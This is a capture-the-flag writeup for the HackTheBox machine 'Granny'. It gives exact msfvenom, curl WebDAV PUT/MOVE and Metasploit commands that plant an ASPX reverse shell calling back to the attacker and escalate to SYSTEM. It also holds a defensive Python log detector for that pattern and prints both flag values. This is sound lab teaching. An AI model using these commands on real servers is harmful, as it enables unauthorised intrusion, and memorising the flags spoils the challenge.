Wednesday 15 April 2020

10.10.10.15 GRANNY hackthebox machine writeup

GRANNY 10.10.10.15 Write Up

Machine Created by ch4p

Tools Used for Enumeration:

1. nmap
2. davtest

Tools Used for Exploitation:

1. metasploit

Steps for primary enumeration:

1. First we use nmap (the Network Mapper) to scan the box IP. The scan returns a list of open ports and the services running on them. On the Granny box only one port is open: port 80, running Microsoft IIS httpd 6.0.

Command used: nmap -A 10.10.10.15

2. Opening the site in a browser shows the default IIS "Under Construction" page, and the server exposes WebDAV.

Steps to get user.txt: 

1. The nmap scan showed that the PUT method is allowed via WebDAV.
2. We can use the davtest tool to check which file types the server accepts. Command used: davtest -url http://10.10.10.15

3. We can create a Metasploit reverse shell payload to upload with the command "msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.21 LPORT=1337 -f aspx > zishan.aspx". Then we upload it under a .txt name with "curl -X PUT http://10.10.10.15/zishan.txt --data-binary @zishan.aspx". Finally we rename the text file to an executable extension with "curl -X MOVE -H 'Destination: http://10.10.10.15/zishan.aspx' http://10.10.10.15/zishan.txt" (the server only listens on port 80, so the URLs use http).

4. Now we can listen with the Metasploit module "exploit/multi/handler", setting LHOST and LPORT to match the payload and the payload to "windows/meterpreter/reverse_tcp". Requesting the uploaded shell with "curl http://10.10.10.15/zishan.aspx" triggers the callback and gives us a shell.
5. We can find candidate local exploits with the module "post/multi/recon/local_exploit_suggester" after setting LHOST and the SESSION of the meterpreter shell.

6. By testing a working module from the suggestions we can get a SYSTEM-privileged shell on the machine. Module used: exploit/windows/local/ms14_058_track_popup_menu

7. Now we can read user.txt with the command "cat 'C:\Documents and Settings\Lakis\Desktop\user.txt'".
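From the defender's side, the sequence in steps 3 and 4 (a PUT with a harmless extension, a MOVE of that same path, then a GET of a server-side script) leaves a distinctive trail in the IIS W3C logs. The following detector is an added example, not part of the original writeup and not a Metasploit or HTB tool; the log lines are constructed to mirror that sequence, and the field layout assumes the default IIS 6 W3C extended format. Because IIS does not log the MOVE Destination header, the script correlates on the same client and the same file stem instead.

```python
"""Flag the WebDAV upload-then-rename-then-execute pattern in IIS W3C logs.

Added example for the writeup above; the sample log is constructed, not taken
from the Granny box. Assumes the default IIS 6 W3C extended log fields.
"""
import os
from collections import defaultdict

# Constructed sample: a client PUTs a .txt, MOVEs it, then GETs the .aspx,
# followed by an unrelated benign PUT from a different client.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2020-04-15 10:00:01 10.10.10.15 GET / - 80 - 10.10.14.21 curl/7.68.0 200 0 0
2020-04-15 10:00:05 10.10.10.15 OPTIONS / - 80 - 10.10.14.21 DAV-client 200 0 0
2020-04-15 10:00:09 10.10.10.15 PUT /shell.txt - 80 - 10.10.14.21 curl/7.68.0 201 0 0
2020-04-15 10:00:12 10.10.10.15 MOVE /shell.txt - 80 - 10.10.14.21 curl/7.68.0 201 0 0
2020-04-15 10:00:15 10.10.10.15 GET /shell.aspx - 80 - 10.10.14.21 curl/7.68.0 200 0 0
2020-04-15 10:01:00 10.10.10.15 PUT /notes.txt - 80 - 10.10.14.30 Mozilla/5.0 201 0 0
"""

# Extensions that IIS 6 hands to a script engine; a PUT or GET of one of these
# after a rename is what we care about.
EXEC_EXT = {".aspx", ".asp", ".asa", ".ashx", ".asmx", ".cer", ".cdx"}
# WebDAV methods that modify the web root; every success is worth a record.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}


def parse_iis_log(text):
    """Parse W3C extended log text into a list of dicts keyed by the #Fields names."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            if fields is None:
                raise ValueError("log entries appear before a #Fields header")
            parts = line.split()
            if len(parts) == len(fields):  # drop malformed lines
                rows.append(dict(zip(fields, parts)))
    return rows


def _ext(path):
    return os.path.splitext(path.lower())[1]


def _stem(path):
    return os.path.splitext(path.lower())[0]


def find_webdav_alerts(rows):
    """Return (severity, client_ip, message) tuples for suspicious WebDAV activity."""
    alerts = []
    put_paths = defaultdict(set)    # client -> paths it successfully PUT
    moved_stems = defaultdict(set)  # client -> stems of uploaded paths it then MOVEd
    for r in rows:
        method, path, client, status = (
            r["cs-method"], r["cs-uri-stem"], r["c-ip"], r["sc-status"])
        ok = status.startswith("2")
        if method in WRITE_METHODS:
            alerts.append(("info", client, f"{method} {path} -> {status}"))
        if method == "PUT" and ok:
            put_paths[client].add(path)
            if _ext(path) in EXEC_EXT:
                alerts.append(("high", client, f"PUT of server-side script {path}"))
        elif method == "MOVE" and ok and path in put_paths[client]:
            # Destination is not logged, so remember the stem for later matching.
            moved_stems[client].add(_stem(path))
            alerts.append(("medium", client,
                           f"MOVE of recently uploaded {path} (possible extension rename)"))
        elif method == "GET" and ok and _ext(path) in EXEC_EXT \
                and _stem(path) in moved_stems[client]:
            alerts.append(("high", client,
                           f"GET {path} after PUT+MOVE of same stem from this client"))
    return alerts


def severity_counts(alerts):
    """Count alerts per severity, handy for a quick triage summary."""
    counts = defaultdict(int)
    for sev, _, _ in alerts:
        counts[sev] += 1
    return dict(counts)


if __name__ == "__main__":
    for sev, client, msg in find_webdav_alerts(parse_iis_log(SAMPLE_LOG)):
        print(f"[{sev:6}] {client:14} {msg}")
```

Run against a real log directory by replacing SAMPLE_LOG with the file contents; the "info" records alone show whether anonymous WebDAV writes are happening at all, which on a production IIS host is already worth a ticket.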

Steps to get root.txt:

1. We can read the root.txt flag with the command "cat 'C:\Documents and Settings\Administrator\Desktop\root.txt'".

Flags:

1. user.txt flag: 700c5dc163014e22b3e408f8703f67d1
2. root.txt flag: aa4beed1c0584445ab463a6747bd06e9

References:

1. https://forum.hackthebox.eu/discussion/54/granny-retired-box-hint-request

Videos:

1. Ippsec walkthrough: https://www.youtube.com/watch?v=ZfPVGJGkORQ
